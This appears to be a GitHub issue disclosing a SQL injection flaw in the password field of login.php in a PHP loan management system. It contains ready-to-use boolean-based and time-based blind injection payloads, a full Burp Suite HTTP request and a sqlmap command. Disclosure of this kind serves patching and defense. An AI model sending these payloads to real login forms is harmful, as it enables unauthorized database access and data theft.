You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
charonwang has discovered that Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0 is affected by serious security vulnerabilities due to insufficient protection of the "password" parameter in the "login.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
Vulnerability Details
Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0
Vulnerable File: login.php
Parameter Names: password
Attack Type: Remote
Description
charonwang has discovered that Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0 is affected by serious security vulnerabilities due to insufficient protection of the "password" parameter in the "login.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: username=admin&password=admin111' OR NOT 5946=5946#&login=
Vector: OR NOT [INFERENCE]#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin&password=admin111' AND (SELECT 2451 FROM (SELECT(SLEEP(5)))FOOe)-- lCKh&login=
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
Burp Suite (POC):
POST /login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Connection: close
Cookie: PHPSESSID=mnhh06uo91qagrf4fhvggc6lo4
Upgrade-Insecure-Requests: 1
username=admin&password=admin111' AND (SELECT 2451 FROM (SELECT(SLEEP(10)))FOOe)-- lCKh&login=
The text was updated successfully, but these errors were encountered:
Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0 login.php - SQL injection vulnerability
Vendor Homepage
Software Link
Overvie
Vulnerability Details
Description
Proof of Concept (PoC) :
sqlmap -u "http://www.lms.com:8105/login.php" --dbms=mysql -v 3 -p 'password' --data="username=admin&password=admin111&login=" --method='POST'
Burp Suite (POC):
The text was updated successfully, but these errors were encountered: